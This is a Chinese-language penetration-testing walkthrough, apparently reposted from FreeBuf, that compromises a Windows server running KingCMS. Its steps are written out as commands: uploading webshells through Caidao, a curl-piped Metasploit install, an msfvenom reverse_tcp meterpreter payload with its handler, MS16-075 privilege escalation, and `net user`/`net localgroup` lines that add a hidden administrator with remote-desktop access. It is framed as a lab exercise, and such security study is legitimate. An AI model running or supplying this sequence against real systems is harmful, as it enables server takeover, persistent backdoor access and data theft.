原理图

先在被攻击机中上传小马文件,然后用菜刀连接被上传木马的机器

上传大马文件

用本机连接大马

用大马生成文件:systeminfo > C:\www\KingCMS\q.txt

使用wesng进行补丁筛选(python wes.py .txt -o vuln.csv)

连接云服务器,并下载msf:curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

生成反弹shell的exe文件,IP为使用msf的主机的ip,监听端口为5555,通过菜刀上传到win server(msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=5555 -f exe > q.exe)

安装rz和sz命令(yum install lrzsz)

输入sz q.exe,将.exe文件下载至本机

运行msf :msfconsole;

msf设置端口监听(use /exploit/multi/handler>)

设置payload(set payload windows/meterpreter/reverse_tcp)

查看配置(show options)

设置监听端口(set lport 5555)

设置监听ip,全部监听(set lhost 0.0.0.0)

最后执行开始监听(exploit)

菜刀中执行exe文件,打开虚拟终端即可执行

getuid(查看用户);background(保存会话退出)

msf提权

MSF设置payload (ms16-075)

search ms16-075

use 1

set payload windows/x64/meterpreter/reverse_tcp

设置会话session,看刚刚挂起是session的编号 (set session 2)

设置payload参数(端口换个6666,lhost换成攻击机的IP)

exploit执行,成功即为提权成功

输入shell,进行如下操作:

net user username password /add  创建用户

net localgroup "Remote Desktop Users" username /add  将创建的用户添加到远程连接组

net localgroup Administrators username /add 将创建的用户添加到管理员组

然后即可通过远程登录进入

本机进行远程连接

至此实验成功!

本文作者:hongxiuqingzan, 转自FreeBuf